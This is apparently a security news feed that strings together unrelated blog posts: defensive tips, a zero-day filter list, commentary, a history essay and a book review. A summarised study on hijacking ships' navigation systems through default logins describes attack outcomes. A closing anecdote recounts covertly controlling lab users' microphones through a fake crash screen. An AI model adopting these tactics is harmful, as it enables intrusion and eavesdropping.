  • Encrypting emails: To avoid the possible theft of emails containing confidential information, your company must have a system that encrypts all emails sent by employees, making it necessary to introduce an additional password in order to gain access to the content of the email.
  • Having an advanced cybersecurity solution: Using a suite like Panda Adaptive Defense will help you to detect any possible attempts to attack your company via email, thanks to the use of cognitive intelligence and a real time detection system. This way, you will avoid possible financial losses that can result from this kind of cyberattack.

The post Emails, the gateway for threats to your company appeared first on Panda Security Mediacenter.

Can we trust our online project management tools?

How would you feel about sharing confidential information about your company on Twitter or Facebook? That doesn’t sound right, does it? So, in a corporate life where we keep our work calendars online, and where we work together on projects using online flow-planners and online project management software, it might pay off to wonder whether the shared content is safe from prying eyes.

What are we looking at?

From the easy-to-use shared document on Google Drive to full-fledged Trello boards that we use to manage complicated projects—basically everything that uses the cloud as a server is our subject here. When evaluating your online project management tools, it is important from a security standpoint to have an overview of:

  • Which online project management platforms are you using?
  • Which data are you sharing on which platforms?
  • Who has access to those data?

Once you know this, you can move on to the main question:

  • Is the data that should stay confidential shielded well enough?

What are the risks?

The risks of using online project management tools are made up of several elements. Once again, a list of questions will help you gage this, including:

  • How secure is the platform you are using?
  • Do the people that have access to the data need to have access? And are they given access to see all the information that is shared, or just a portion?

As you can see, we are not just worrying about outsiders getting ahold of information. Sometimes, we must keep secrets, even from our own co-workers. Not every company has an open salary policy, for example, so the information how much everyone makes might not be allowed outside of HR.

But the threat of a breach is the most important one. Having the competition know about the latest project your design team is working on can be deadly in some industries. And of course, any project that contains customer data and is not secured can be breached by a cybercriminal. Knowing this, it’s our job to help you find the safest possible tool to perform your job.

Does it make sense to share online?

Are we sharing information online because we need to do it online or just because we can? Sometimes being the cool kids that use an online project management platform that has all the bells and whistles is more a matter of convenience than it is strictly necessary. But if you are:

  • employing remote workers
  • cooperating between offices around the world
  • heavily relying on a BYOD strategy

then online tools maybe the only way to realize your project management goals.

Every ounce of prevention

What you don’t share can’t get lost. And control over what you do share (and with whom) is adamant.

  • Limit the amount of privileged information you are sharing. Make sure that only the information needed for the project is being shared with the appropriate team members.
  • Change the login credentials at a regular interval, and do this in a non-predictable way. Going from “passwordMay” to “passwordJune” at the end of the month will not stop nosy co-workers from digging. Do not post the new credentials on the platform, either.
  • Use 2FA where and if possible to enhance login security.
  • Update and patch the software as soon as possible. This limits the risk of anyone abusing a published vulnerability in the platform.
  • Keep tally of who is supposed to have access at all times, and check this against the connected devices when and if you can.

Breach management

Hardening your online tools against breaches is usually in the hands of toolmakers themselves—the software provider or the cloud service provider with whom you’ve partnered. Therefore, it makes sense to look into the project management tool’s reputation for security, as well as its ability to serve your company’s needs. While you can’t control the security of the tool itself, you can limit the consequences of a mishap, should it occur, by doing the following:

  • Don’t try to keep it a secret when credentials have been found in the wrong hands. Making participants aware of the situation helps them to change passwords and follow up with other appropriate actions.
  • Make sure there are backups of important data. Someone with unauthorized access may believe in burning the bridges behind them.
  • In case of a breach, try your best to find out exactly how it happened. Was there a vulnerability in the tool? Did a team member open up a malicious attachment? This will assist you in preventing similar attacks.

Controlling the risks

Working in the cloud can be useful for project management, but sometimes we need a reminder that there are risks involved. If you set up an online project management tool or other cloud-based project, it’s good to be aware of these risks and give some thought to the ways you can limit them.

When you’re working on a project for your company—whether it’s leading a team or participating in the project’s development—it’s important to make data losses as rare as possible, to learn from your mistakes, and to handle breaches and other security incidents responsibly.

Stay safe out there!

The post Can we trust our online project management tools? appeared first on Malwarebytes Labs.

Zero-Day Coverage Update – Week of July 2, 2018

The General Data Protection Regulation (GDPR) has been up and running for a couple of months now and your organization is compliant. It’s time to take a little break – well, not so fast! Late last week, the State of California passed a new data privacy law called the California Consumer Privacy Act of 2018. Set to go in effect on January 1, 2020, it is being regarded as the strongest digital privacy policy in the United States. While it’s not as comprehensive as GDPR, there is opportunity for additional revisions to the law since it was passed by the legislature just in time to withdraw the proposed law from the November ballot. Had the initiative ended up on the ballot, any amendments to the existing text would be next to impossible. There will be much more discussion on this as the deadline gets closer. In the meantime, you can check to see if your organization is GDPR compliant by visiting www.trendmicro.com/gdpr.

Zero-Day Filters

There are 29 new zero-day filters covering eight vendors in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of published advisories and upcoming advisories on the Zero Day Initiative website. You can also follow the Zero Day Initiative on Twitter @thezdi and on their blog.

ABB (4)

  • 32331: ZDI-CAN-6144: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32332: ZDI-CAN-6143: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32334: ZDI-CAN-6142: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32336: ZDI-CAN-6136: Zero Day Initiative Vulnerability (ABB Panel Builder 800)

Advantech (3)

  • 32353: ZDI-CAN-6300: Zero Day Initiative Vulnerability (Advantech WebAccess Node)
  • 32354: ZDI-CAN-6301: Zero Day Initiative Vulnerability (Advantech WebAccess Node)
  • 32356: ZDI-CAN-6302: Zero Day Initiative Vulnerability (Advantech WebAccess Node)

Delta (1)

  • 32348: ZDI-CAN-6322: Zero Day Initiative Vulnerability (Delta Industrial Automation PMSoft)

Foxit (4)

  • 32343: ZDI-CAN-6332: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32345: ZDI-CAN-6330: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32346: ZDI-CAN-6329: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32347: ZDI-CAN-6326: Zero Day Initiative Vulnerability (Foxit Reader)

LAquis SCADA (1)

  • 32351: ZDI-CAN-6319: Zero Day Initiative Vulnerability (LAquis SCADA)

Microsoft (2)

  • 32350: ZDI-CAN-6080: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 32352: ZDI-CAN-6081: Zero Day Initiative Vulnerability (Microsoft Windows)

Quest (2)

  • 32342: ZDI-CAN-6075: Zero Day Initiative Vulnerability (Quest KACE Systems Management)
  • 32355: ZDI-CAN-6095: Zero Day Initiative Vulnerability (Quest KACE Systems Management)

WECON (12)

  • 32257: ZDI-CAN-5956: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32319: ZDI-CAN-5924: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32323: ZDI-CAN-5938: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32324: ZDI-CAN-5931: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32325: ZDI-CAN-5929,5930: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32326: ZDI-CAN-5928: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32328: ZDI-CAN-5925,5926: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32329: ZDI-CAN-5927: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32330: ZDI-CAN-6062: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32333: ZDI-CAN-6063,6065: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32335: ZDI-CAN-6064: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32339: ZDI-CAN-6067: Zero Day Initiative Vulnerability (WECON LeviStudioU)

Missed Last Week’s News?

Catch up on last week’s news in my weekly recap.

The post Zero-Day Coverage Update – Week of July 2, 2018 appeared first on .

Is Article 13 about to ruin the Internet?

European lawmakers were set to vote on changes on the 5th July that will dramatically increase Internet regulation. Perhaps the biggest proposed change is the introduction of Article 13 which is intended to improve copyright protection.

Under the terms of Article 13, any Internet platform that hosts “large amounts” of user-uploaded content is expected to monitor every submission. This means identifying and removing any content that infringes copyright.

Blocking copyright infringement is good…

Content creators – like musicians and filmmakers – rely on their work to provide an income. When people reuse that content, the original creator loses out. Some people would say that it is no different to stealing food from your local supermarket.

Obviously protecting copyright is incredibly important to these people. And it is for their protection that Article 13 has been created.

…but auto-blocking isn’t

According to the latest statistics, 60 hours of videos are uploaded to YouTube every minute. It would be physically impossible to employ people to check each film for copyright infringements (unlicensed clips or background music). Instead, content platform owners like Facebook, Flickr and YouTube will need to develop an automated system to analyse content as it is uploaded.

The problem is that automated systems tend to be pretty poor. YouTube has tried content scanning in the past – Content ID – which was notorious for creating false positives, blocking perfectly legitimate movies in the process.

A more sinister future?

Some Internet experts are concerned about the longer term implications of Article 13, suggesting that the new regulations could be misused. They believe that the law creates a new surveillance framework that could be easily subverted by totalitarian governments to curb free speech.

Internet blackouts and bans on sites that are perceived as anti-government are already a regular occurrence in Turkey, Iran and China. These experiences suggest that the fear of government interference is not entirely unwarranted.

Linking to sites could be expensive

Have you ever shared a link to a news article on your Facebook page? Another update to the regulation – Article 11 – defines a new tax on platforms for linking to news articles. In future, Facebook could be charged because you share a link to a BBC News story.

With millions of pages being shared every day, Facebook will face a huge bill for the activities of their users. In order to protect their profits, Facebook may ban links to news websites, or even charge users for the service.

Decision time

The proposed changes have already passed scrutiny and will be approved (or denied) by MEPs today. Article 13 (and other amendments) will then be written into law and applied by all member states in due course. Importantly firms based outside the European Union will be expected to adhere to the new regulations.

Unfortunately, it is almost impossible to plan for the new regulation because the European Union has not specified exactly how the link tax or copyright filter will work. Should Articles 11 and 13 become law, the way you use the web may change forever.

Download Panda FREE VPN

The post Is Article 13 about to ruin the Internet? appeared first on Panda Security Mediacenter.

BSides Springfield Preview: How To DevOps (While Sneaking in Security)

As companies embrace the DevOps phenomenon in hopes of producing applications at a faster rate, they are also introducing insecure software into the digital ecosystem. DevOps, itself, is a software lifecycle movement which blends developmental and operational tasks together to accelerate application-building in a quick, clean, and repetitive manner for faster time-to-market. In DevOps environments, […]… Read More

The post BSides Springfield Preview: How To DevOps (While Sneaking in Security) appeared first on The State of Security.

Tripwire Patch Priority Index for June 2018

Tripwire’s June 2018 Patch Priority Index (PPI) brings together the top vulnerabilities from Microsoft and Adobe. First on the patch priority list this month are patches for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These Adobe Flash patches address type confusion, integer overflow, out-of-bounds read and stack-based buffer overflow vulnerabilities. Note that […]… Read More

The post Tripwire Patch Priority Index for June 2018 appeared first on The State of Security.

Danger on board: shipping routes are at risk

Updates to the cybersecurity ecosystem seem to have gotten lost at sea for the shipping industry. Measures that have been outdated for years in other sectors are still in force on the high seas, meaning that ships are susceptible to being robbed, hacked, and even sunk. Vessels that were traditionally isolated are, thanks to the Internet of things and advances in technology, now always online via VSAT, GSM/LTE and WiFi connections, and have complex electronic navigation systems.

Discover Panda Adaptive Defense

A study by Pen Test Partners has shown how easy it is to gain access to a vessel in the shipping industry.  Some of the access methods presented are truly worrying: exposed satellite communication terminals, user interfaces accessed via insecure protocols, default login details that have never been modified… The list goes on. In this industry, a cyberattack would have an enormous economic and business impact, since maritime transport moves goods totaling millions of Euros all around the world.

Satellite communications: a threat in motion

Thanks to Shodan, a search engine for IoT connected devices, the Pen Test researchers discovered in previous investigations that the configurations of some satellite antenna systems were easily identifiable through old firmware or unauthenticated connections.  To gain access to systems, and ultimately hack them, they came across dangerous default login details, like “admin/1234”.

ECDIS, charting a course for disaster

The Electronic Chart Display and Information System (ECDIS) is the electronic system used by these ships to navigate, and that also warns the captain about any hazards on their course. This tool, which contains graphical and nautical information, is an alternative to the old fashioned maritime maps that don’t offer information in real time.  Upon testing over 20 different ECDISs, the analysts discovered that most of them used very old operating systems (some with Windows NT, from 1993), and incorporated configuration interfaces with low levels of protection.

In this way, the researchers demonstrated that cyberattackers could cause the ship to crash by accessing the ECDIS and reconfiguring the database in order to modify the dimensions of the ship. If the ship seemed to be a different size, longer or wider than it really is, the electronic systems would offer incorrect information to other nearby crews.  They also showed that attackers could force a collision by falsifying the position of the ship shown on the GPS receiver.  It may sound implausible, but in the case of particularly busy shipping routes or places with low visibility, a falsification of this type could be catastrophic.

Even if the vulnerabilities shown by the analysts aren’t exploited in such an extreme way, it’s hugely important to know that security gaps in vessels can cause substantial damage, both to national industries and in the maritime environment, including ports, canals, and docks.  The analysts underlined that, by using ECDIS, it is also possible to gain access to the systems that warn the captain of possible collision scenarios.  By controlling these collision alarms, attackers could bring routes as important as the English Channel to a standstill, endangering the imports and exports of a whole country.

Simple solutions for complex systems

As well as updating systems and ensuring that no sensitive information is exposed on the network, the shipping industry must also maintain the defenses that are needed for Internet devices, like we’ve seen in the case of satellite communication systems. To maintain connection privacy, Transport Layer Security (TLS) protocols must be put in place on these devices, since a failure in just one device can compromise the security of the whole network.

The analysts reported that a first step to mitigate most of the problems exposed in the study would be to use strong passwords for admin profiles, making sure to modify the default login details.  To avoid serious problems like sabotage, destruction of ships or goods, collisions, and loss of infrastructure, it’s essential to have protection systems for the whole network perimeter, including the transport of goods, to bring the domain of cybersecurity out into international waters.

The post Danger on board: shipping routes are at risk appeared first on Panda Security Mediacenter.

SN 670: Wi-Fi Protected Access v3

This week we discuss the interesting case of a VirusTotal upload... or was it?, newly discovered problems with our 4G LTE... and even what follows, another new EFF encryption initiative, troubles with Spectre and Meltdown in some browsers, the evolution of UPnP-enabled attacks, an unpatched Wordpress vulnerability that doesn't appear to be worrying the Wordpress devs... and an early look at next year's forthcoming WPA3 standard... which appears to fix everything!

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

Summer Vacation Plans? Be Safe When Connecting!

Tips to Protect Yourself While Traveling

Summer travel should be a respite from work, when you relax and don’t have to worry about business. And your mobile devices can help make it easier, whether it’s booking a flight or a hotel room, ordering a cab or an Uber driver, browsing websites for your next destination, connecting to family via voice or messaging, even purchasing items in a checkout line or withdrawing cash from an ATM.

That said, all this digital convenience comes at a certain price of vigilance: there are more ways than ever to be exposed to threats on your mobile devices, to have your data, money, or identity stolen. These threats usually arrive by way of your networking options, when emailing, messaging, browsing, or using particular apps and online accounts. Wi-Fi leads the way, followed by near-field communication (NFC) and even Bluetooth (in certain circumstances). But even a simple QR scan on your smartphone or insertion of a USB stick into your laptop can open you up to unexpected threats.

Just when, where, and how do travelers need to be cautious? And how can you protect yourself from networking threats that can turn your vacation into a nightmare?

Wi-Fi Safety Measures

Wi-Fi is your main avenue for online connections. Wi-Fi hotspots are everywhere today, in airport terminals or on the shuttle bus, in restaurants and in sidewalk cafes, in your hotel room or out in the mall. How do you safely connect to Wi-Fi?

  • For starters, make sure your phone or tablet has a current, updated OS before you leave home, with the latest security patches. This minimizes the vulnerability of your mobile device.
  • Turn off auto-connect to the nearest available Wi-Fi hotspot, such as the town or plaza’s unsecured router. When you’re travelling to new places, retain the option to decide just where and when you want to connect.
  • Before you connect to public Wi-Fi, turn off automatic file sharing/sync. You don’t want your precious files intercepted.
  • Watch out for copycat/evil twin Wi-Fi hotspots that look like legitimate ones. Check the URL for odd changes to the expected format/syntax, possibly indicating a spoofed malicious website. Check commerce or banking URLs for the green Secure lock and the https:// designation before you conduct transactions.
  • Don’t be lulled by the Wi-Fi available in your cozy hotel room. Password-protected, even paid Wi-Fi, is not necessarily properly encrypted, as set up by the hotel technician. WEP encryption, the first security option in Wi-Fi routers, is relatively weak and easy for hackers to break into.
  • If Wi-Fi isn’t available, don’t use your smartphone’s Portable Wi-Fi Hotspot in a public place, to prevent unwanted users or hackers from accessing it. If you do turn it on (in a safer place), increase your security by changing the default SSID (or hiding it), using a strong randomized password, and enabling WPA2 encryption, not WEP, which is easier to hack, as noted above. Note that you’ll need a mobile service and data plan that supports your Portable Wi-FI Hotspot and the higher data usage.
  • Use a VPN app to secure your connection to public Wi-Fi. This encrypts your data, so it can’t be read by a “man-in-the-middle.” Conversely, if you don’t have VPN app, don’t log onto log onto a sensitive or financial site with your ID and password, particularly in places where people congregate. You don’t want your credentials stolen by that plain-looking hacker sitting quietly behind his laptop in the corner of the room!
  • Use browser protection to block bad URLs while browsing and to protect your device from drive-by downloads.
  • Use a password manager to access your personal accounts. This ensures your ID and password is encrypted, while enforcing the use of strong, unique passwords. Personal accounts should be set up beforehand with two-factor authentication, where your smartphone is sent the code for access.
  • To be super-safe, encrypt the data on your mobile device’s main disk and/or SD card, though check beforehand which countries ban such software to enter the country.
  • Install security software on your mobile device, if you haven’t already. This not only protects your mobile device from fake apps and viruses while on the move, it typically lets you remotely lock or wipe it of personal data should it be lost or stolen.
  • Heed all the relevant tips above for your laptop too.

USB, QR Code, Near-Field Communication (NFC), and Bluetooth Safety Measures

While Wi-Fi is the most likely vector for threats while traveling, a few more “connected” scenarios are sources for possible attacks:

  • Whenever possible, use your own charging equipment to recharge your mobile device. Public charging spots may be tampered with for “juice-jacking,” where malware can be installed on your device via USB, to copy all your data covertly. And don’t insert USB sticks in your laptop from “friendly” strangers, to share photos or files and such. The USB stick may be infected with viruses or data-stealing malware.
  • Be cautious when scanning QR codes, whether they’re on flyers stuck on your rental car in the parking lot, stickers pasted over legitimate product ads, or QR-enabled display cards for purchasing anything in a convenience store. Malicious QR codes can take you to malicious websites, which download viruses or malware on your device.
  • Don’t put your NFC-enabled Android smartphone (for use with Android Pay, Google Pay, or Samsung Pay, etc.) in a pocket that could be “bumped” in a crowded public space by a hacker with an NFC-enabled phone or a snooping device, which can install viruses or malware on your phone. Be careful of things like posters that sport unprotected NFC chips (for example, for movie previews and the like). Exposed chips can be pasted-over with spoofed, malicious chips. Check to make sure the NFC-enabled ATM hasn’t been tampered with when you’re using it to extract money from your bank account.
  • For the super-cautious: Turn off Bluetooth in public spaces, unless you’re using it to connect to your keyboard, mouse, or smartwatch, etc. Bluetooth snoopers can potentially access your device to control it or to download malware (a rare occurrence, it’s true, but possible). Turning off Bluetooth also helps save battery life.

Mobile Security While on the Road

Fortunately, Trend Micro provides a bevy of free and paid apps that can help you stay secure while traveling.

Free:

  • Trend Micro Zero Brower on iOS provides web-threat and virus protection when browsing.
  • Trend Micro QR Scanner for Android ensures secure QR code scanning, so you can’t be taken to a malicious website by a bad QR code.
  • Trend Micro Password Manager on Android and iOS (free versions) provide encrypted logins with strong passwords for five online accounts.

Paid:

o Android – Provides a Wi-Fi Checker, protects your browser from web threats, scans apps before they’re downloaded from Google Play, and provides  antimalware, antivirus protections using real-time and manual scans. Parental and App Controls let parents protect kids at home or traveling from inappropriate websites or prohibited applications. You also get Lost Device Protection, to lock or wipe your device if its lost or stolen.

o iOS – Also provides a Wi-Fi Checker, a SafeSurfing browser, a Secure QR Code Scanner, a Content Shield (with a Firewall, Website Filter, and Parental Controls), and Lost Device Protection.

  • Finally, Trend Micro Security for Windows and Mac provides full security across all attack vectors for your PC or Mac laptop. Trend Micro Maximum Security edition provides a Secure Erase and a password-protected file Vault to protect your critical files while traveling. It also lets you install additional protection for up to ten seats, including Windows, Mac, Android, and iOS devices.

Go to Trend Micro Security Products for Home for more information about Trend Micro’s security products and services for everyday users, including those for mobile devices.

The post Summer Vacation Plans? Be Safe When Connecting! appeared first on .

Employee habits that can put your company at risk

We often talk about the cybersecurity risks that companies can be exposed to through their own Internet connections, but the truth is that most of the time, the employees themselves tend to be the weakest link in the company.

And the fact remains that there are several things that employees may do every day that could well lead to serious security breaches. That’s why it’s a good idea to be up to speed with the threats you could be facing, and to be responsible when managing the tools that are used to handle the company’s information.

Be careful with public WiFi

Although this habit is probably one of the most widespread among the majority of employees, it’s also one of the least advisable.  These days we struggle between wanting to consume more content and trying to use less data. This means that finding a totally or partially open Wi-Fi connection can seem like a godsend, especially for someone needing to do something work-related, such as connect to the company’s internal network, send large files, log on to platforms that consume a lot of data, and so on.

However, using public WiFi can really put your company’s cybersecurity at risk. When in use, this connection can expose the user to possible intruders who, with a bit of social engineering, could gain access to the employee in question’s data: usernames and passwords, or confidential company information, to name but a few. Stealing information through open WiFi connections isn’t as difficult as you might expect, so it’s best not to trust them to keep you safe.

How to avoid it

To avoid this kind of risk, it’s absolutely essential that employees avoid using open WiFi connections wherever possible.  In the rare case that an employee has no choice but to use a connection of this type, they should do so with a VPN that can protect their data, and, more importantly, any sensitive information that they may have on their device, thereby minimizing the possible risks.

Phising, malware, and intrusions

The endless back and forth of emails is a constant in almost every type of company, which can entail certain risks.  One clear example of this is the tech support scam: an employee receives an email in which they are asked for certain data, with the pretext of needing to solve some kind of technical problem. The employee is asked for certain information, which then ends up in the hands of someone who can jeopardize the whole company’s cybersecurity.

But this isn’t the only case. A cybercriminal can also send an email impersonating another employee, with an attachment that could be invasive, steal data from the computer, or even spy on and monitor the activity carried out on the device.

Mobile apps can also pose a series of risks. If an employee is in the habit of using their personal phone to handle company data and information, managing apps improperly could give rise to problems, especially if access is granted to unofficial apps that, in the same way as malware, get hold of the information stored on the phone, spy on it, or even modify its operation guidelines.

How to avoid it

The key thing here is raising awareness about corporate cybersecurity: every company must make sure its employees know the importance of being responsible with emails and the apps on their phones.  In the case of the latter, they should only be downloaded from operating systems’ official stores.

On the other hand, it’s important for companies to have ransomware insurance, and encryption on their company email. This way, as well as avoiding possible intruders, if someone does manage to gain unauthorized access to the IT system, confidential information will be better protected, and the company’s cybersecurity won’t be compromised.  If you want a tool that can help you to avoid unwanted visitors, you can try Panda Adaptive Defense, the tool that will help you to batten down the hatches of your company’s IT security. Panda’s advanced cybersecurity solution allows you to stay ahead of attacks, even before they happen, limiting the risks stemming from everyday tasks that employees carry out without thinking.

The post Employee habits that can put your company at risk appeared first on Panda Security Mediacenter.

This Day in History: Gettysburg Shoes

July 1st marks the beginning of a Civil War battle that many historians say is one of the most pivotal. And, as many historians also like to note, a love of pillaging Americans for their shoes supposedly is what drew pro-slavery forces arrogantly into Gettysburg on this date.

This topic of shaking-down hardworking Americans for their shoes is tied to General A. P. Hill. The man was a wealthy elitist who expected things for free (see also: slavery) and eagerly had abandoned his appointment in the U.S. Army to fight against freedom. To put it simply, Hill was committed to the violent expansion of slavery long after the practice had been abolished around the world.

Two decades before Hill was born, in 1807 the English already had abolished its slave trade. The idea of slavery became so unjustifiable in English society that by “1824 there were more than 200 branches of the Anti-Slavery Society in Britain“. No surprise then the agrarian state of New York abolished slavery 1827, England emancipated slaves in 1833, English Colonies 1838…but I’m getting ahead of myself here.

Mary Wollstonecraft, credited with helping found modern British feminist ethics, famously wrote against slavery in 1792,:

Is sugar always to be produced by vital blood? Is one half of the human species, like the poor African slaves, to be subject to prejudices that brutalise them, when principles would be a surer guard, only to sweeten the cup of man? Is not this indirectly to deny woman reason?

Wollstonecraft’s sentiment was shared in the colonies, believe it or not, and thus we see examples like the agrarian colony of New York debating how to expedite emancipation, two decades earlier than Wollstonecraft’s call for a boycott on slave-made goods:

Most of the Revolutionary leaders who came to power in New York in 1777 had anti-slavery sentiments, yet, as elsewhere in the North, the urgency of the war with Britain made them delay, and they restricted their activity to a policy statement and an appeal to future legislatures “to take the most effective measures consistent with public safety for abolishing domestic slavery.” This resolution passed in the state Constitutional Convention by a vote of 29 to 5.

Note the five dissenters. Obviously some in the 1700s were not quite convinced. And so by 1861 we have a treasonous General A. P. Hill taking up arms against his own country. In a nutshell, many white elitist men in America did not want to do hard work and believed their easy/lazy lives and financial inheritances (see also: people treated as property to be bought and sold) were threatened unless they could continue to enslave Americans and steal their goods.

Today you may be surprised to see the U.S. Army has named a fort after an infamously treasonous and foolish man like A. P. Hill. Given that he dedicated his life to killing American soldiers for personal profit, who thought this made any sense?

The installation was named in honor of Lt. Gen. Ambrose Powell Hill, a Virginia native who distinguished himself…

Please take special note of the fact that the U.S. Army doesn’t call the person they are honoring an American, because his treason to preserve slavery by killing Americans, killed his citizenship.

Also nice try U.S. Army with your Virginia reference. Obviously Hill was far from being a true native of Virginia.

That being said I must agree with the second part of the sentence, this treasonous man hateful of his own country certainly distinguished himself. The U.S. Army doesn’t mention it but his impatience, as well as lust for plundering Americans and putting people in chains, may have led to one of the greatest tactical blunders in U.S. military history. So distinguishable.

Also he contracted gonorrhea while a cadet at West Point, screwed around so much he graduated late, and became known for taking “sick leave” right in the heat of any major battle.

Now, to be fair to Hill being so distinguished, I must admit he shared poor decision-making with his pro-slavery General Heth on June 30th, 1863. Heth had ordered his pro-slavery General Pettigrew to enter Gettysburg and ransack it. Pettigrew had followed these orders at first but turned tail after he observed American cavalry and infantry already near the town.

In “The Civil War: A Narrative” there’s a scene where Hill approaches Heth and hears of Pettigrew’s reluctance. Hill, our man of the hour, then insists to Heth there can be no significant American forces present.

OOPS.

The narrative tells us Heth obediently then sends his Pettigrew back once again to plunder Gettysburg and “get those shoes!”

Narratives aside, by 5AM on July 1st, as Heth himself approached Gettysburg to damage it, he realized Pettigrew had been right, Hill was stupidly wrong, and significant numbers of American forces were present. Yet even that didn’t dissuade Heth, who continued ordering Pettigrew to march on.

Hill’s insistence that he conferred with Lee and there would be no resistance to plunder seems to be the real story here, shoes or not. There was an inherent desperation of Lee and his pro-slavery men to plunder America (see also: slavery), which on this particular day began the largest land battle in the western hemisphere, lasting 3 days and killing nearly 50,000 people, to the disadvantage of pro-slavery forces.

One of the stranger footnotes (no pun intended) to this story is that while Gettysburg had a lot of American forces defending freedom, it didn’t have any shoes.

These pro-slavery Generals, all of them, not only chose to be blind to the evils of slavery, they also were blind on two more levels. A particularly inhumane General with the ironic name of Early (infamous for helping to invent the “Lost Cause” view) had tried to pillage Gettysburg days before Heth had set his sights on it.

This means Americans living in Gettysburg already had been subjected to pro-slavery militia demanding ransom in 1,000 shoes and attacking the town.

No shoes were found, as you can plainly read here:

Had there been any shoes, they might have been the standard issue “Jefferson Boots”, named after Thomas Jefferson who is thought to have created an American fad for French ankle-high laced shoes by wearing them instead of previously common English ones with large buckles.

However, again I must say, NO SHOES IN GETTYSBURG.

So for those historians arguing pro-slavery forces really centered their offensive on shoes, maybe put a sock in it.

Is there any evidence that pro-slavery General Early told others that the town couldn’t cough up any Jefferson boots despite his violent demands? Lee and Hill both supposedly had scouts relaying information but perhaps it wouldn’t have made any difference what Early said, given how Pettigrew was rebuffed when he tried to explain the dangers of trying to plunder Americans on this day.

To put this in perspective, it’s not like in the days leading up to the Gettysburg battle someone could tell Lee or Hill that slavery is unjustified and they would listen; if these men wanted stealing to be in their plans, they were going to threaten and kill Americans until some damn things to steal were found or everyone was dead for refusing to see things the pro-slavery way.

Again, Hill quit the U.S. Army to plunder America in the most unjustified way to retain elite status. In that sense Gettysburg was simply another day of plunder to Hill and his men, whether stealing goods, separating babies from mothers, or perpetuating slavery to improve his own status at the expense of others.

Within three days pro-slavery forces had been destroyed at Gettysburg, which helped signal an end to their plans to use violence against fellow citizens to expand slavery practices into western territories (what the war was really about); 60 years after England had abolished slavery, and 30 years after slaves in America (if still colonies) would have been emancipated, the self-proclaimed “elite” white supremacists fighting to perpetuate obviously tyrannical practices of their former King were defeated (pun not intended).

Also, just as one final footnote, I think it is time for the U.S. Army to officially remove honors to Hill. I say that not only because Hill was a murderous traitor and terror to Americans, but also because we could say he finally got the boot he so desired.

Book Review: The Mission, the Men and Me

Pete Blaber’s book “The Mission, the Men, and Me: Lessons from a Former Delta Force Commander” gets a lot of rave reviews about business practices and management tips.

It’s hard not to agree with some of his principles, such as “Don’t Get Treed by a Chihuahua”. This phrase is a cute way of saying know your adversary before taking extreme self-limiting action. Who would disagree with that?

But I’m getting ahead of myself. The book begins with a story of childhood, where Pete reflects on how he topographically mastered his neighborhood and could escape authorities. That gives way to a story of his trials and tribulations in the Army, where during training he was tested by unfamiliar topography and uncertain threats. It is from this training scenario that Pete formulates his principle to not jump off a cliff when a pig grunted at him (sorry, spoiler alert).

Maybe a less cute and more common way of saying this would be that managers should avoid rushing into conclusions when a little reflection on the situation is possible to help choose the most effective path. Abraham Lincoln probably said it best:

Give me six hours to chop down a tree and I will spend the first four sharpening the axe.

How should someone identify whether they are facing a Chihuahua, given their other option is to blindly climb a tree? Pete leaves this quandary up to the reader, making it less than ideal advice. I mean if in an attempt to identify whether you are facing a Chihuahua, wild pig or a bear you get mauled to death, could you sue Pete for bad advice? No, because it was a bear and instead of being up a tree you are dead.


Given the lessons learned in joining the Army, Pete transitions to even more topographical study. He masters mountain climbing with a team in harsh weather. It’s a very enjoyable read. I especially like the part where money is no object and the absolute best climbing technology is available. There’s no escaping the fact that the military pushes boundaries in gear research and keeps an open mind/wallet to technology innovations.

From there I can easily make the connection to the climax of the book, where he leads a team on a topographically challenging mission and minimizes their risk of detection. It really comes full circle to his childhood stories.

However, there are a few parts of the book that I found strangely inconsistent, which marred an otherwise quick and interesting read.

For example, Pete makes a comment about religion and culture that seems uninformed or just lazy. He refers to Cat Stevens as the “most renowned celebrity convert to Islam”:

I’m not claiming to be an expert in celebrity status or Islam, just saying it should be kind of obvious to everyone in the world that Muhammad Ali (nee Cassius Clay) is far more renowned as a celebrity convert to Islam. I don’t think Cat Stevens even breaks into top ten territory.

Afer winning the Olympics in 1960, the hugely popular Clay not only went on to convert he also refused serving US armed forces in Vietnam because a “minister in the religion of Islam”. As the FBI puts it in their release of surveillance files:

…famed Olympian, professional boxer and noted public figure. This release consists of materials from FBI files that show Ali’s relationship with the Nation of Islam in 1966.

Pete’s comment about Cat Stevens suggests that despite the no-holds-barred approach to piles of rock, he may lack knowledge in human topics essential to conflicts he was training to win. A quick look at discussion of Islamic celebrities backs up this point:

Pete was wandering on that flat line at the bottom while giant mountains of culture stood right above him, unexplored, despite his access to the best tools.

There are at least two more examples of this class of error in the book. I may update the post with them as I have time.

The Psychology of “Talking Paper”

Sometime in the late 1980s I managed to push a fake “bomb” screen to Macintosh users in networked computer labs. It looked something like this:

There wasn’t anything wrong with the system. I simply wanted the users in a remote room to restart because I had pushed an “extension” to their system that allowed me remote control of their speaker (and microphone). They always pushed the restart button. Why wouldn’t they?

